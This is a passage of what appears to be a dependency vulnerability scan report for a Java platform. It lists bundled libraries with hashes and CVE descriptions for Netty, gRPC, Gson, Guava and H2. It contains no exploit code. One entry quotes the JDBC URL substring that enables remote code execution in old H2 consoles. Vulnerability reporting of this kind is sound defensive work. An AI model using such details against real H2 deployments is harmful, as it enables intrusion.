- MISC - https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4
- MISC - https://www.oracle.com/security-alerts/cpuapr2022.html
- OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
- OSSINDEX - [CVE-2021-21295] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
- OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21295
- OSSIndex - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj
- OSSIndex - https://lists.apache.org/thread/ztx01jknlcoq0v6pp2cwl609dyzk9r5h
Vulnerable Software & Versions:
CVE-2021-21409
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.61.Final there is a vulnerability that enables request smuggling. The content-length header is not correctly validated if the request only uses a single Http2HeaderFrame with the endStream set to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. This is a followup of GHSA-wm47-8v5p-wjpj/CVE-2021-21295, which missed this one case. This was fixed as part of 4.1.61.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2021-21290
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory if temporary storing of uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default, will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData", which is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify one's own "java.io.tmpdir" when starting the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2022-24823
Netty is an open-source, asynchronous event-driven network application framework. The package `io.netty:netty-codec-http` prior to version 4.1.77.Final contains an insufficient fix for CVE-2021-21290. When Netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. Version 4.1.77.Final contains a patch for this vulnerability. As a workaround, specify one's own `java.io.tmpdir` when starting the JVM or use DefaultHttpDataFactory.setBaseDir(...) to set the directory to something that is only readable by the current user. CWE-378 Creation of Temporary File With Insecure Permissions, CWE-379 Creation of Temporary File in Directory with Incorrect Permissions, CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2: Base Score: LOW (1.9) Vector: /AV:L/AC:M/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
References:
Vulnerable Software & Versions:
grpc-netty-shaded-1.23.0.jar (shaded: org.jctools:jctools-core:2.1.1)
Description: Java Concurrency Tools Core Library
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/maven/org.jctools/jctools-core/pom.xml
MD5: d532029de01ef1c790266dea91b1ecdc
SHA1: f9571c65e428d21c795a34de2b217419dfc0e2f7
SHA256: db8f1cd5b23d38e3dcf7020d739e1c2f9559489051291d8a07095e62b8d7f750
Referenced In Project/Scope: Simplicite Platform:compile
Evidence
Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | jctools-core | Low
Vendor | pom | groupid | org.jctools | Highest
Vendor | pom | name | Java Concurrency Tools Core Library | High
Vendor | pom | url | JCTools | Highest
Product | pom | artifactid | jctools-core | Highest
Product | pom | groupid | org.jctools | Highest
Product | pom | name | Java Concurrency Tools Core Library | High
Product | pom | url | JCTools | High
Version | pom | version | 2.1.1 | Highest
grpc-netty-shaded-1.23.0.jar: io_grpc_netty_shaded_netty_tcnative_windows_x86_64.dll
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-netty-shaded/1.23.0/grpc-netty-shaded-1.23.0.jar/META-INF/native/io_grpc_netty_shaded_netty_tcnative_windows_x86_64.dll
MD5: 3acf5856f6d7220d0df297d7561f6185
SHA1: a5b0d662ffbef4edf8d3a85a1d55b6ddeb5ce722
SHA256: 40a5afc34fc237c1509c11faa3e39269c1ad73563a55fab076266468f945d514
Referenced In Project/Scope: Simplicite Platform:compile
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | io_grpc_netty_shaded_netty_tcnative_windows_x86_64 | High
Product | file | name | io_grpc_netty_shaded_netty_tcnative_windows_x86_64 | High
grpc-protobuf-1.23.0.jar
Description: gRPC: Protobuf
License: Apache 2.0: https://opensource.org/licenses/Apache-2.0
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-protobuf/1.23.0/grpc-protobuf-1.23.0.jar
MD5: 1728bcd7cf27ebaec2b18ee47fce3168
SHA1: 01428515d3aca8964dfdc4d4ba912d0fda0f41f2
SHA256: 3d009822afa7b898c15a53e9d5d037a7dde9011eb3d523e59717391b5f5ae417
Referenced In Project/Scope: Simplicite Platform:compile
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | grpc-protobuf | High
Vendor | jar | package name | grpc | Highest
Vendor | jar | package name | io | Highest
Vendor | jar | package name | protobuf | Highest
Vendor | Manifest | source-compatibility | 1.7 | Low
Vendor | Manifest | target-compatibility | 1.7 | Low
Vendor | pom | artifactid | grpc-protobuf | Highest
Vendor | pom | artifactid | grpc-protobuf | Low
Vendor | pom | developer email | grpc-io@googlegroups.com | Low
Vendor | pom | developer id | grpc.io | Medium
Vendor | pom | developer name | gRPC Contributors | Medium
Vendor | pom | developer org | gRPC Authors | Medium
Vendor | pom | developer org URL | https://www.google.com | Medium
Vendor | pom | groupid | io.grpc | Highest
Vendor | pom | name | io.grpc:grpc-protobuf | High
Vendor | pom | url | grpc/grpc-java | Highest
Product | file | name | grpc-protobuf | High
Product | jar | package name | grpc | Highest
Product | jar | package name | io | Highest
Product | jar | package name | protobuf | Highest
Product | Manifest | Implementation-Title | grpc-protobuf | High
Product | Manifest | source-compatibility | 1.7 | Low
Product | Manifest | target-compatibility | 1.7 | Low
Product | pom | artifactid | grpc-protobuf | Highest
Product | pom | developer email | grpc-io@googlegroups.com | Low
Product | pom | developer id | grpc.io | Low
Product | pom | developer name | gRPC Contributors | Low
Product | pom | developer org | gRPC Authors | Low
Product | pom | developer org URL | https://www.google.com | Low
Product | pom | groupid | io.grpc | Highest
Product | pom | name | io.grpc:grpc-protobuf | High
Product | pom | url | grpc/grpc-java | High
Version | file | version | 1.23.0 | High
Version | Manifest | Implementation-Version | 1.23.0 | High
Version | pom | version | 1.23.0 | Highest
Related Dependencies
grpc-protobuf-lite-1.23.0.jar
File Path: /var/simplicite/.m2/repository/io/grpc/grpc-protobuf-lite/1.23.0/grpc-protobuf-lite-1.23.0.jar
MD5: 10c36a9052a14ac18c3151090f3781b3
SHA1: c030daf2f8c4185ee003e206c38e28987fe2684d
SHA256: 97d3a160b0c1a753307181b518e072baec2018d2e7a13e64071ab2be76c3b962
pkg:maven/io.grpc/grpc-protobuf-lite@1.23.0
CVE-2023-33953
gRPC contains a vulnerability in which hpack table accounting errors could lead to unwanted disconnects between clients and servers in exceptional cases. Three vectors were found that allow the following DOS attacks:
- Unbounded memory buffering in the HPACK parser
- Unbounded CPU consumption in the HPACK parser
The unbounded CPU consumption is down to a copy that occurred per-input-block in the parser, and because that could be unbounded due to the memory copy bug we end up with an O(n^2) parsing loop, with n selected by the client.
The unbounded memory buffering bugs:
- The header size limit check was behind the string reading code, so we needed to first buffer up to a 4 gigabyte string before rejecting it as longer than 8 or 16kb.
- HPACK varints have an encoding quirk whereby an infinite number of 0’s can be added at the start of an integer. gRPC’s hpack parser needed to read all of them before concluding a parse.
- gRPC’s metadata overflow check was performed per frame, so that the following sequence of frames could cause infinite buffering: HEADERS: containing a: 1 CONTINUATION: containing a: 2 CONTINUATION: containing a: 3 etc…
CWE-834 Excessive Iteration, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-4785
Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++, Python, and Ruby are affected, but gRPC Java and Go are NOT affected. NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-32732
gRPC contains a vulnerability whereby a client can cause a termination of connection between a HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309
NVD-CWE-Other
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
References:
Vulnerable Software & Versions:
gson-2.8.5.jar
Description: Gson JSON library
File Path: /var/simplicite/.m2/repository/com/google/code/gson/gson/2.8.5/gson-2.8.5.jar
MD5: 089104cb90d8b4e1aa00b1f5faef0742
SHA1: f645ed69d595b24d4cf8b3fbb64cc505bede8829
SHA256: 233a0149fc365c9f6edbd683cfe266b19bdc773be98eabdaf6b3c924b48e7d81
Referenced In Project/Scope: Simplicite Platform:compile
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | gson | High
Vendor | jar | package name | google | Highest
Vendor | jar | package name | gson | Highest
Vendor | Manifest | bundle-contactaddress | https://github.com/google/gson | Low
Vendor | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5, JavaSE-1.6, JavaSE-1.7, JavaSE-1.8 | Low
Vendor | Manifest | bundle-symbolicname | com.google.gson | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Vendor | pom | artifactid | gson | Highest
Vendor | pom | artifactid | gson | Low
Vendor | pom | groupid | com.google.code.gson | Highest
Vendor | pom | name | Gson | High
Vendor | pom | parent-artifactid | gson-parent | Low
Product | file | name | gson | High
Product | jar | package name | google | Highest
Product | jar | package name | gson | Highest
Product | Manifest | bundle-contactaddress | https://github.com/google/gson | Low
Product | Manifest | Bundle-Name | Gson | Medium
Product | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5, JavaSE-1.6, JavaSE-1.7, JavaSE-1.8 | Low
Product | Manifest | bundle-symbolicname | com.google.gson | Medium
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Product | pom | artifactid | gson | Highest
Product | pom | groupid | com.google.code.gson | Highest
Product | pom | name | Gson | High
Product | pom | parent-artifactid | gson-parent | Medium
Version | file | version | 2.8.5 | High
Version | Manifest | Bundle-Version | 2.8.5 | High
Version | pom | version | 2.8.5 | Highest
CVE-2022-25647
The package com.google.code.gson:gson before 2.8.9 is vulnerable to Deserialization of Untrusted Data via the writeReplace() method in internal classes, which may lead to DoS attacks. CWE-502 Deserialization of Untrusted Data
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
guava-28.1-jre.jar
Description: Guava is a suite of core and expanded libraries that include utility classes, google's collections, io classes, and much much more.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/guava/guava/28.1-jre/guava-28.1-jre.jar
MD5: 4faae794936faf441fcb7afb2c7db507
SHA1: b0e91dcb6a44ffb6221b5027e12a5cb34b841145
SHA256: 30beb8b8527bd07c6e747e77f1a92122c2f29d57ce347461a4a55eb26e382da4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | guava | High
Vendor | jar | package name | common | Highest
Vendor | jar | package name | google | Highest
Vendor | Manifest | automatic-module-name | com.google.common | Medium
Vendor | Manifest | bundle-docurl | https://github.com/google/guava/ | Low
Vendor | Manifest | bundle-symbolicname | com.google.guava | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" | Low
Vendor | pom | artifactid | guava | Highest
Vendor | pom | artifactid | guava | Low
Vendor | pom | groupid | com.google.guava | Highest
Vendor | pom | name | Guava: Google Core Libraries for Java | High
Vendor | pom | parent-artifactid | guava-parent | Low
Product | file | name | guava | High
Product | jar | package name | common | Highest
Product | jar | package name | google | Highest
Product | Manifest | automatic-module-name | com.google.common | Medium
Product | Manifest | bundle-docurl | https://github.com/google/guava/ | Low
Product | Manifest | Bundle-Name | Guava: Google Core Libraries for Java | Medium
Product | Manifest | bundle-symbolicname | com.google.guava | Medium
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" | Low
Product | pom | artifactid | guava | Highest
Product | pom | groupid | com.google.guava | Highest
Product | pom | name | Guava: Google Core Libraries for Java | High
Product | pom | parent-artifactid | guava-parent | Medium
Version | pom | version | 28.1-jre | Highest
CVE-2023-2976
Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.
Even though the security vulnerability is fixed in version 32.0.0, we recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.
CWE-552 Files or Directories Accessible to External Parties
CVSSv3: Base Score: HIGH (7.1) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2020-8908
A temp directory creation vulnerability exists in all versions of Guava, allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava API com.google.common.io.Files.createTempDir(). By default, on unix-like systems, the created directory is world-readable (readable by an attacker with access to the system). The method in question has been marked @Deprecated in versions 30.0 and later and should not be used. For Android developers, we recommend choosing a temporary directory API provided by Android, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.
CWE-732 Incorrect Permission Assignment for Critical Resource
CVSSv2: Base Score: LOW (2.1) Vector: /AV:L/AC:L/Au:N/C:P/I:N/A:N
CVSSv3: Base Score: LOW (3.3) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
References:
Vulnerable Software & Versions:
guice-3.0.jar
Description: Guice is a lightweight dependency injection framework for Java 5 and above
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/inject/guice/3.0/guice-3.0.jar
MD5: ca1c7ba366884cfcd2cfb48d2395c400
SHA1: 9d84f15fe35e2c716a02979fb62f50a29f38aefa
SHA256: 1a59d0421ffd355cc0b70b42df1c2e9af744c8a2d0c92da379f5fca2f07f1d22
Referenced In Project/Scope: Simplicite Platform:compile
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | guice | High
Vendor | jar | package name | google | Highest
Vendor | jar | package name | guice | Highest
Vendor | jar | package name | inject | Highest
Vendor | Manifest | bundle-copyright | Copyright (C) 2006 Google Inc. | Low
Vendor | Manifest | bundle-docurl | http://code.google.com/p/google-guice/ | Low
Vendor | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5,JavaSE-1.6 | Low
Vendor | Manifest | bundle-symbolicname | com.google.inject | Medium
Vendor | pom | artifactid | guice | Highest
Vendor | pom | artifactid | guice | Low
Vendor | pom | groupid | com.google.inject | Highest
Vendor | pom | name | Google Guice - Core Library | High
Vendor | pom | parent-artifactid | guice-parent | Low
Product | file | name | guice | High
Product | jar | package name | dependency | Highest
Product | jar | package name | google | Highest
Product | jar | package name | guice | Highest
Product | jar | package name | inject | Highest
Product | Manifest | bundle-copyright | Copyright (C) 2006 Google Inc. | Low
Product | Manifest | bundle-docurl | http://code.google.com/p/google-guice/ | Low
Product | Manifest | Bundle-Name | guice | Medium
Product | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5,JavaSE-1.6 | Low
Product | Manifest | bundle-symbolicname | com.google.inject | Medium
Product | pom | artifactid | guice | Highest
Product | pom | groupid | com.google.inject | Highest
Product | pom | name | Google Guice - Core Library | High
Product | pom | parent-artifactid | guice-parent | Medium
Version | file | version | 3.0 | High
Version | pom | version | 3.0 | Highest
guice-assistedinject-3.0.jar
Description: Guice is a lightweight dependency injection framework for Java 5 and above
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/inject/extensions/guice-assistedinject/3.0/guice-assistedinject-3.0.jar
MD5: 64341453ad4102f01761c62a22af0977
SHA1: 544449ddb19f088dcde44f055d30a08835a954a7
SHA256: 29a0e823babf10e28c6d3c71b2f9d56a3be2c9696d016fb16258e3fb1d184cf1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence
Type | Source | Name | Value | Confidence
Vendor | file | name | guice-assistedinject | High
Vendor | jar | package name | assistedinject | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | inject | Highest
Vendor | Manifest | bundle-copyright | Copyright (C) 2006 Google Inc. | Low
Vendor | Manifest | bundle-docurl | http://code.google.com/p/google-guice/ | Low
Vendor | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5,JavaSE-1.6 | Low
Vendor | Manifest | bundle-symbolicname | com.google.inject.assistedinject | Medium
Vendor | pom | artifactid | guice-assistedinject | Highest
Vendor | pom | artifactid | guice-assistedinject | Low
Vendor | pom | groupid | com.google.inject.extensions | Highest
Vendor | pom | name | Google Guice - Extensions - AssistedInject | High
Vendor | pom | parent-artifactid | extensions-parent | Low
Product | file | name | guice-assistedinject | High
Product | jar | package name | assistedinject | Highest
Product | jar | package name | google | Highest
Product | jar | package name | inject | Highest
Product | Manifest | bundle-copyright | Copyright (C) 2006 Google Inc. | Low
Product | Manifest | bundle-docurl | http://code.google.com/p/google-guice/ | Low
Product | Manifest | Bundle-Name | guice-assistedinject | Medium
Product | Manifest | bundle-requiredexecutionenvironment | J2SE-1.5,JavaSE-1.6 | Low
Product | Manifest | bundle-symbolicname | com.google.inject.assistedinject | Medium
Product | pom | artifactid | guice-assistedinject | Highest
Product | pom | groupid | com.google.inject.extensions | Highest
Product | pom | name | Google Guice - Extensions - AssistedInject | High
Product | pom | parent-artifactid | extensions-parent | Medium
Version | file | version | 3.0 | High
Version | pom | version | 3.0 | Highest
guice-multibindings-3.0.jar
Description:
Guice is a lightweight dependency injection framework for Java 5 and above License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/inject/extensions/guice-multibindings/3.0/guice-multibindings-3.0.jar
MD5: 4be1e91408e173eb10ed53a1a565a793
SHA1: 5e670615a927571234df68a8b1fe1a16272be555
SHA256: 29dd9f7774314827319cca4f00b693f0685f9dc3248c50c1ec54acc4819d4306
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name guice-multibindings High Vendor jar package name google Highest Vendor jar package name inject Highest Vendor jar package name multibindings Highest Vendor Manifest bundle-copyright Copyright (C) 2006 Google Inc. Low Vendor Manifest bundle-docurl http://code.google.com/p/google-guice/ Low Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5,JavaSE-1.6 Low Vendor Manifest bundle-symbolicname com.google.inject.multibindings Medium Vendor pom artifactid guice-multibindings Highest Vendor pom artifactid guice-multibindings Low Vendor pom groupid com.google.inject.extensions Highest Vendor pom name Google Guice - Extensions - MultiBindings High Vendor pom parent-artifactid extensions-parent Low Product file name guice-multibindings High Product jar package name google Highest Product jar package name inject Highest Product jar package name multibindings Highest Product Manifest bundle-copyright Copyright (C) 2006 Google Inc. Low Product Manifest bundle-docurl http://code.google.com/p/google-guice/ Low Product Manifest Bundle-Name guice-multibindings Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5,JavaSE-1.6 Low Product Manifest bundle-symbolicname com.google.inject.multibindings Medium Product pom artifactid guice-multibindings Highest Product pom groupid com.google.inject.extensions Highest Product pom name Google Guice - Extensions - MultiBindings High Product pom parent-artifactid extensions-parent Medium Version file version 3.0 High Version pom version 3.0 Highest
h2-1.4.199.jar
Description:
H2 Database Engine License:
MPL 2.0 or EPL 1.0: http://h2database.com/html/license.html File Path: /var/simplicite/.m2/repository/com/h2database/h2/1.4.199/h2-1.4.199.jar
MD5: f805f57d838de4b42ce01c7f85e46e1c
SHA1: 7bf08152984ed8859740ae3f97fae6c72771ae45
SHA256: 3125a16743bc6b4cfbb61abba783203f1fb68230aa0fdc97898f796f99a5d42e
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name h2 High Vendor jar package name database Highest Vendor jar package name engine Highest Vendor jar package name h2 Highest Vendor Manifest automatic-module-name com.h2database Medium Vendor Manifest bundle-category jdbc Low Vendor Manifest bundle-symbolicname com.h2database Medium Vendor Manifest implementation-url http://www.h2database.com Low Vendor Manifest multi-release true Low Vendor Manifest provide-capability osgi.service;objectClass:List=org.osgi.service.jdbc.DataSourceFactory Low Vendor pom artifactid h2 Highest Vendor pom artifactid h2 Low Vendor pom developer email thomas.tom.mueller at gmail dot com Low Vendor pom developer id thomas.tom.mueller Medium Vendor pom developer name Thomas Mueller Medium Vendor pom groupid com.h2database Highest Vendor pom name H2 Database Engine High Vendor pom url http://www.h2database.com Highest Product file name h2 High Product jar package name database Highest Product jar package name engine Highest Product jar package name h2 Highest Product jar package name jdbc Highest Product jar package name org Highest Product jar package name service Highest Product Manifest automatic-module-name com.h2database Medium Product Manifest bundle-category jdbc Low Product Manifest Bundle-Name H2 Database Engine Medium Product Manifest bundle-symbolicname com.h2database Medium Product Manifest Implementation-Title H2 Database Engine High Product Manifest implementation-url http://www.h2database.com Low Product Manifest multi-release true Low Product Manifest provide-capability osgi.service;objectClass:List=org.osgi.service.jdbc.DataSourceFactory Low Product pom artifactid h2 Highest Product pom developer email thomas.tom.mueller at gmail dot com Low Product pom developer id thomas.tom.mueller Low Product pom developer name Thomas Mueller Low Product pom groupid com.h2database Highest Product pom name H2 Database Engine High Product pom url http://www.h2database.com Medium 
Version file version 1.4.199 High Version Manifest Bundle-Version 1.4.199 High Version Manifest Implementation-Version 1.4.199 High Version pom version 1.4.199 Highest
CVE-2021-42392
The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and the URL of the database. An attacker may pass a JNDI driver name and a URL pointing to an LDAP or RMI server, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console, which leads to unauthenticated remote code execution. CWE-502 Deserialization of Untrusted Data
CVSSv2:
Base Score: HIGH (10.0) Vector: /AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2022-23221
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392. CWE-88 Argument Injection or Modification
CVSSv2:
Base Score: HIGH (10.0) Vector: /AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2021-23463
The package com.h2database:h2 from 1.4.198 and before 2.0.202 is vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object when it receives parsed string data from the org.h2.jdbc.JdbcResultSet.getSQLXML() method. Executing the getSource() method with DOMSource.class as the parameter triggers the vulnerability. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:P
CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-45868
The web-based admin console in H2 Database Engine through 2.1.214 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password for the web admin console in cleartext. Consequently, a local user (or an attacker who has obtained local access by some means) can discover the password by listing processes and their arguments. NOTE: the vendor states "This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that." CWE-312 Cleartext Storage of Sensitive Information
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2018-14335 (OSSINDEX)
h2database - Improper Link Resolution Before File Access
The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource. CWE-59 Improper Link Resolution Before File Access ('Link Following')
CVSSv2:
Base Score: MEDIUM (6.0) Vector: /AV:L/AC:L/Au:/C:H/I:N/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.h2database:h2:1.4.199:*:*:*:*:*:*:*
h2-1.4.199.jar: data.zip: table.js
File Path: /var/simplicite/.m2/repository/com/h2database/h2/1.4.199/h2-1.4.199.jar/org/h2/util/data.zip/org/h2/server/web/res/table.js
MD5: 289efd1154e2d82bd3fff47f88ba76f8
SHA1: 236891ee6a10b1af6f9824fb91be634474ab9ebe
SHA256: 4cca2cf66410a065181050b98003ecf35291deb2c70b9484b0e3c79c7068f454
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence
h2-1.4.199.jar: data.zip: tree.js
File Path: /var/simplicite/.m2/repository/com/h2database/h2/1.4.199/h2-1.4.199.jar/org/h2/util/data.zip/org/h2/server/web/res/tree.js
MD5: 01bfc955082b057fbef6b096569b98ea
SHA1: f6e97f37a8929ea4b6a2bfd08619888329e15160
SHA256: 87605a4b4bec508664529e4700ebd08753e2d65a11e532ab15ebf996d3dd8805
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence
hamcrest-core-1.3.jar
Description:
This is the core API of the hamcrest matcher framework, to be used by third-party framework providers. It includes a foundation set of matcher implementations for common operations.
File Path: /var/simplicite/.m2/repository/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar
MD5: 6393363b47ddcbba82321110c3e07519
SHA1: 42a25dc3219429f0e5d060061f71acb49bf010a0
SHA256: 66fdef91e9739348df7a096aa384a5685f4e875584cce89386a7a47251c4d8e9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name hamcrest-core High Vendor jar package name core Highest Vendor jar package name hamcrest Highest Vendor jar package name matcher Highest Vendor Manifest built-date 2012-07-09 19:49:34 Low Vendor Manifest Implementation-Vendor hamcrest.org High Vendor pom artifactid hamcrest-core Highest Vendor pom artifactid hamcrest-core Low Vendor pom groupid org.hamcrest Highest Vendor pom name Hamcrest Core High Vendor pom parent-artifactid hamcrest-parent Low Product file name hamcrest-core High Product jar package name core Highest Product jar package name hamcrest Highest Product jar package name matcher Highest Product Manifest built-date 2012-07-09 19:49:34 Low Product Manifest Implementation-Title hamcrest-core High Product pom artifactid hamcrest-core Highest Product pom groupid org.hamcrest Highest Product pom name Hamcrest Core High Product pom parent-artifactid hamcrest-parent Medium Version file version 1.3 High Version Manifest Implementation-Version 1.3 High Version pom version 1.3 Highest
hsqldb-2.5.0.jar
Description:
HSQLDB - Lightweight 100% Java SQL Database Engine License:
HSQLDB License, a BSD open source license: http://hsqldb.org/web/hsqlLicense.html File Path: /var/simplicite/.m2/repository/org/hsqldb/hsqldb/2.5.0/hsqldb-2.5.0.jar
MD5: 0e1021ba547f94a472f3e76806747f7b
SHA1: 59298fcd77faf01e02b405def2f80cccbf582508
SHA256: acda459cc9d6a07b39b284364e93b5f29e11877d687e9544b91778d3554d2b38
